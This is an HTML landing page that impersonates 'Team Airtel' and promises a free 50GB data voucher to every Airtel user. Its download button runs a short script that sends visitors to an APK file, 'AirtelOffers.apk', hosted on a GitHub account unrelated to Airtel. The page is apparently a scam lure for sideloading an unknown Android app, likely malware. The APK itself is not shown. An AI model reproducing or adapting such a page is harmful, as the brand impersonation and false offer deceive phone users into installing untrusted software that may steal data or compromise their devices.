<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>
<!-- Primary Meta Tags -->
<title>Airtel 50GB-Voucher</title>
<meta name="title" content="Airtel 50GB-Voucher">
<meta name="description" content="">

<!-- Open Graph / Facebook -->
<meta property="og:type" content="website">
<meta property="og:title" content="Airtel 50GB Voucher">
<meta property="og:description" content="50GB Voucher for all Airtel users for 3-MONTHS">
<meta property="og:image" content="https://i.postimg.cc/mrX6KrsL/airtt.png">

<!-- Twitter -->
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:title" content="Airtel 50GB Voucher">
<meta property="twitter:description" content="50GB Voucher for all Airtel users for 3-MONTHS">
<meta property="twitter:image" content="https://i.postimg.cc/mrX6KrsL/airtt.png">

<style>
body{
background-color:#fff;
color:#000;
font-family: sans-serif;
}
p,h2{
color:#000;
}
.myButton {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.center-screen {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.myButton:hover {
	background-color:#314179;
}
.myButton:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function donva() 
{
    var m = new Date().getMinutes(); 
	if(m<500)
	{
		window.location="https://github.com/airtel50GB/Apk/raw/main/AirtelOffers.apk"; 
	}
	else if(m<55)
	{
		window.location="https://github.com/airtel50GB/Apk/raw/main/AirtelOffers.apk";
	}
	else
	{
		window.location="https://github.com/airtel50GB/Apk/raw/main/AirtelOffers.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="center-screen">
	<img src="https://i.postimg.cc/mrX6KrsL/airtt.png" width="20%" />
	<br>
	<p><h1>Airtel 50GB-Voucher</h1>
		<h2>Get Free 50-GB Voucher from Airtel<br>
		Offer for all Airtel Users<Br>
		Team Airtel.<br> 
		</h2>
<h3>Register your Number on (AirtelOffers) app.<br>
and Enjoy 50GB-Voucher daily.</h3>
	</p>
	<a onClick="donva()" class="myButton">Download Now(.APK)</a>
</div>
</center>
</body>
</html>